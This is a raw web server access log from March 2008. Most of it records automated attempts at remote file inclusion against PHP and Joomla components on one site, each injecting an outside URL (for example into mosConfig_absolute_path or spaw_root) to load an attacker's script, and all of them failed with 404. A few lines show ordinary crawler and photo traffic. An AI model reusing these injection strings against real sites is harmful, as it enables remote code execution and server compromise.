58.26.137.64 - - [16/Mar/2008:05:00:01 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.195.44.94 - - [16/Mar/2008:05:00:04 -0700] "GET /logs/access.log HTTP/1.0" 200 187 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.94 - - [16/Mar/2008:05:00:04 -0700] "GET /logs/access_080225.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:05:00:28 -0700] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:05:00:29 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.146.175 - - [16/Mar/2008:05:01:10 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:05:01:40 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:05:01:40 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.7.194 - - [16/Mar/2008:05:02:00 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:02:05 -0700] "GET /logs/access_080119.log//admin/index.php?o=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:02:05 -0700] "GET //admin/index.php?o=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:02:05 -0700] "GET /logs//admin/index.php?o=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:03:54 -0700] "GET /logs/access_080220.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:03:54 -0700] "GET /logs/access_080220.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:03:55 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:03:55 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:04:19 -0700] "GET /logs/access_080119.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.147.134.12 - - [16/Mar/2008:05:04:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:04:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:04:20 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.170.96.181 - - [16/Mar/2008:05:06:30 -0700] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
83.170.96.181 - - [16/Mar/2008:05:06:30 -0700] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.congressovirtualmgf.com/includes/js/calendar/lang/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
66.192.152.130 - - [16/Mar/2008:05:07:27 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.192.152.130 - - [16/Mar/2008:05:07:28 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
87.118.102.153 - - [16/Mar/2008:05:07:37 -0700] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
87.118.102.153 - - [16/Mar/2008:05:07:37 -0700] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
66.192.152.130 - - [16/Mar/2008:05:07:41 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.192.152.130 - - [16/Mar/2008:05:07:42 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://chyna.sufx.net/test.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:05:08:00 -0700] "GET /logs/access_080131.log//components/com_simpleboard/image_upload.php?sbp=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.247.44.96 - - [16/Mar/2008:05:09:08 -0700] "GET /index2.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:09:17 -0700] "GET /logs/access_080225.log/index.php?pagina1=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:09:28 -0700] "GET /index.php?pagina1=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:09:40 -0700] "GET /logs/index.php?pagina1=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:05:09:46 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.23.231 - - [16/Mar/2008:05:09:52 -0700] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:05:11:17 -0700] "GET /logs/access_080131.log/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:05:11:17 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.192.152.130 - - [16/Mar/2008:05:12:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:12:24 -0700] "GET /logs/access_080225.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:12:24 -0700] "GET /index2.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:12:25 -0700] "GET /logs/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:12:28 -0700] "GET /logs/access_080129.log/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:05:12:29 -0700] "GET /logs/access_080119.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:05:12:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:05:12:29 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.99.83 - - [16/Mar/2008:05:12:57 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.zdravenportal.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.181.99.83 - - [16/Mar/2008:05:12:57 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.zdravenportal.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:12:59 -0700] "GET /logs/access_080228.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.176 - - [16/Mar/2008:05:13:00 -0700] "GET /logs/access_080228.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.67.131.105 - - [16/Mar/2008:05:13:14 -0700] "GET /logs/access_080131.log/index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.67.131.105 - - [16/Mar/2008:05:13:14 -0700] "GET /index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.67.131.105 - - [16/Mar/2008:05:13:15 -0700] "GET /logs/index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:13:23 -0700] "GET /logs/access_080131.log/index.php?pagina1=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.196.80.130 - - [16/Mar/2008:05:13:49 -0700] "GET /logs/access_080120.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://contactcraze.com/cmd-asc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:05:13:50 -0700] "GET /logs/access_080225.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:05:13:51 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:05:13:52 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
83.211.37.139 - - [16/Mar/2008:05:14:14 -0700] "GET /logs/access_080131.log/index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.211.37.139 - - [16/Mar/2008:05:14:15 -0700] "GET /index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.211.37.139 - - [16/Mar/2008:05:14:16 -0700] "GET /logs/index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:05:14:50 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [16/Mar/2008:05:14:50 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [16/Mar/2008:05:15:08 -0700] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:05:15:08 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:05:15:08 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:05:15:12 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.67.131.105 - - [16/Mar/2008:05:15:41 -0700] "GET /logs/access_080117.log/index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.245.135 - - [16/Mar/2008:05:16:06 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.48.162 - - [16/Mar/2008:05:16:12 -0700] "GET /logs/access_080204.log/index2.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:05:16:13 -0700] "GET /logs/access_080101.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:05:16:13 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.87.60.4 - - [16/Mar/2008:05:17:57 -0700] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.fansvictorvaldes.es///components/com_rwcards/bmx.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
92.43.20.34 - - [16/Mar/2008:05:18:32 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.43.20.34 - - [16/Mar/2008:05:18:33 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.43.20.34 - - [16/Mar/2008:05:18:34 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:05:18:37 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:05:18:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:05:18:37 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:19:44 -0700] "GET /logs/access.log/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:19:44 -0700] "GET /index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:19:45 -0700] "GET /logs/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [16/Mar/2008:05:19:51 -0700] "GET /logs/access_080211.log/index.php?pageurl=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.211.37.139 - - [16/Mar/2008:05:20:07 -0700] "GET /logs/access_080117.log/index1.php?id1=http://www.hagenclauss.de//vwar/convert/.r/bush?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.93 - - [16/Mar/2008:05:21:10 -0700] "GET /logs/access_080122.log HTTP/1.0" 200 590794 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
148.244.244.128 - - [16/Mar/2008:05:22:00 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:22 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.0" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:22 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.0" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:24 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.0" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:24 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.0" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:25 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.0" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.0" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:27 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.0" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.0" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:29 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.0" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:29 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.0" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:30 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.0" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:32 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.0" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:32 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.0" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:34 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.0" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:34 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.0" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:36 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.0" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:36 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.0" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.0" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.0" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:39 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.0" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.0" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.0" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
213.249.193.2 - - [16/Mar/2008:05:22:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.0" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; acc=r1chj4pqr)" "www.dmulk.com"
